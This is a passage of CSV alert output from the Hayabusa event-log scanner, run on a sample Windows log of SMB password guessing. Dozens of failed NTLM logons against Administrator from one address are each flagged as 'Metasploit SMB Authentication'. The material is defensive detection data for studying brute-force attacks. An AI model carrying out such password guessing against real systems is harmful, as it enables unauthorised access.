Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
